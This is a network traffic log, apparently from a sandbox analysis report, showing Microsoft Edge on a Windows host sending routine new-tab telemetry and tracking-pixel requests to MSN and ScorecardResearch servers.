                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-07 12:19:11 UTC | 956 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:11 GMT
                                                                                                                                                                                                                                                                                                Location: /b2?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                                set-cookie: UID=13987848475950bac8edbe91736252351; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                set-cookie: XID=13987848475950bac8edbe91736252351; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                Via: 1.1 abf6c055b398b223d7325958955066c0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: wXabtqFyTWWIxOX1IBq9KncukHF8NhT1vq1Frm4NgjqPI_R49E-4LA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 50035 | 18.164.96.90 | 443 | 2516 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:12 UTC | 1012 | OUT | GET /b2?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: UID=13987848475950bac8edbe91736252351; XID=13987848475950bac8edbe91736252351
2025-01-07 12:19:12 UTC | 326 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:12 GMT
                                                                                                                                                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                Via: 1.1 58a45bf3f07dfdca95ebcb7935e84994.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: JFK50-P5
                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 16weZwlgi0UV_Ao8B1LVbaYWD3kI11vrvBIW5qeQfmGLuvdxOHQ4dA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 50036 | 52.168.117.171 | 443 | 2516 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:12 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252351081&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 3857
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1
2025-01-07 12:19:12 UTC | 3857 | OUT | Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-07T12:19:11.076Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"f8a778b4-8c8a-4835-928a-5039f4851a73","epoch":"2585619185"},"app":{"locale
2025-01-07 12:19:12 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=600f6524608540b784d83ebb0e42ab87&HASH=600f&LV=202501&V=4&LU=1736252352112; Domain=.microsoft.com; Expires=Wed, 07 Jan 2026 12:19:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=05a1ab3628254374b09ce5392b468534; Domain=.microsoft.com; Expires=Tue, 07 Jan 2025 12:49:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 1031
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:11 GMT
                                                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 50046 | 20.110.205.119 | 443 | 2516 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:12 UTC | 1261 | OUT | GET /c.gif?rnd=1736252351083&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=cd8507b94268428491b16cc06b6a4f34&activityId=cd8507b94268428491b16cc06b6a4f34&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=50B43BAE0D944675912718075641D4BF&MUID=040C031DFB13691C1F601670FA61685C HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: c.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:12 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Set-Cookie: MUID=040C031DFB13691C1F601670FA61685C; domain=.msn.com; expires=Sun, 01-Feb-2026 12:19:12 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                Set-Cookie: SRM_M=040C031DFB13691C1F601670FA61685C; domain=c.msn.com; expires=Sun, 01-Feb-2026 12:19:12 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Set-Cookie: MR=0; domain=c.msn.com; expires=Tue, 14-Jan-2025 12:19:12 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Tue, 07-Jan-2025 12:29:12 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:12 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Content-Length: 42
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:12 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                                                                12 | 192.168.2.7 | 50067 | 52.168.117.171 | 443 | 2516 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:14 UTC | 1044 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252354404&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 11894
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:14 UTC | 11894 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-07T12:19:14.401Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"f8a778b4-8c8a-4835-928a-5039f4851a73","epoch":"2585619185"},"app":{"locale
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:14 UTC | 889 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=cbb8026af83b4321879cf0be33a5dd58&HASH=cbb8&LV=202501&V=4&LU=1736252354884; Domain=.microsoft.com; Expires=Wed, 07 Jan 2026 12:19:14 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=73a17f325ba148d0af782e0156209f98; Domain=.microsoft.com; Expires=Tue, 07 Jan 2025 12:49:14 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 480
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:14 GMT
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                                                                13 | 192.168.2.7 | 50068 | 52.168.117.171 | 443 | 2516 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:14 UTC | 1044 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252354414&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 33609
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; _C_ETH=1; msnup=
2025-01-07 12:19:14 UTC | 16384 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-07T12:19:14.411Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"f8a778b4-8c8a-4835-928a-5039f4851a73","epoch":"2585619185"},"app":{"locale
2025-01-07 12:19:14 UTC | 16384 | OUT | Data Ascii: "data":{"baseType":"MS.News.Web.Base","baseData":{},"page":{"appType":"edgeChromium","canvas":"Browser","config":547,"content":{"title":"New tab","subcategory":"antp","domainId":"340","vertical":"homepage","topic":"Discover"},"isAdEnabled":false,"isAutoRe
2025-01-07 12:19:14 UTC | 841 | OUT | Data Ascii: :{"size":53950,"cache":0}}}},"other":{"type":"c","children":{"[cdn]/statics/icons/favicon_newtabpage.png":{"type":"o","spans":{"network":[6512,516]},"durations":{"connect":323,"request":193,"cdnTCP":86,"cdnSelf":0,"cdnOrigin":0},"scalars":{"size":654,"cac
2025-01-07 12:19:15 UTC | 889 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=d9e11fc38cd542069f3e02ae8ded3153&HASH=d9e1&LV=202501&V=4&LU=1736252354907; Domain=.microsoft.com; Expires=Wed, 07 Jan 2026 12:19:14 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=5094f43a8616409e84dd5c81668e40e1; Domain=.microsoft.com; Expires=Tue, 07 Jan 2025 12:49:14 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 493
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Tue, 07 Jan 2025 12:19:14 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 50069 | 52.168.117.171 | 443 | 2516 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:15 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252355017&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 5380
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; msnup=
2025-01-07 12:19:15 UTC | 5380 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-07T12:19:15.014Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"f8a778b4-8c8a-4835-928a-5039f4851a73","epoch":"2585619185"},"app":{"locale
2025-01-07 12:19:15 UTC | 889 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=e4c2617a9c6f48cd83891c85bf5111cb&HASH=e4c2&LV=202501&V=4&LU=1736252355518; Domain=.microsoft.com; Expires=Wed, 07 Jan 2026 12:19:15 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=0c98d3b8b8094535bc7734af3bea9ace; Domain=.microsoft.com; Expires=Tue, 07 Jan 2025 12:49:15 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 501
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Tue, 07 Jan 2025 12:19:14 GMT
Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                15192.168.2.75007052.168.117.1714432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:15 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252355418&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 9881
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:15 UTC9881OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 37 54 31 32 3a 31 39 3a 31 35 2e 34 31 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 38 61 37 37 38 62 34 2d 38 63 38 61 2d 34 38 33 35 2d 39 32 38 61 2d 35 30 33 39 66 34 38 35 31 61 37 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 35 38 35 36 31 39 31 38 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-07T12:19:15.416Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"f8a778b4-8c8a-4835-928a-5039f4851a73","epoch":"2585619185"},"app":{"loc
2025-01-07 12:19:16 UTC | 889 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=1b55a92517b446dca56d2357f8595a4e&HASH=1b55&LV=202501&V=4&LU=1736252356013; Domain=.microsoft.com; Expires=Wed, 07 Jan 2026 12:19:16 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=b61e8dc463b246ff86cba4286f455021; Domain=.microsoft.com; Expires=Tue, 07 Jan 2025 12:49:16 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 595
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
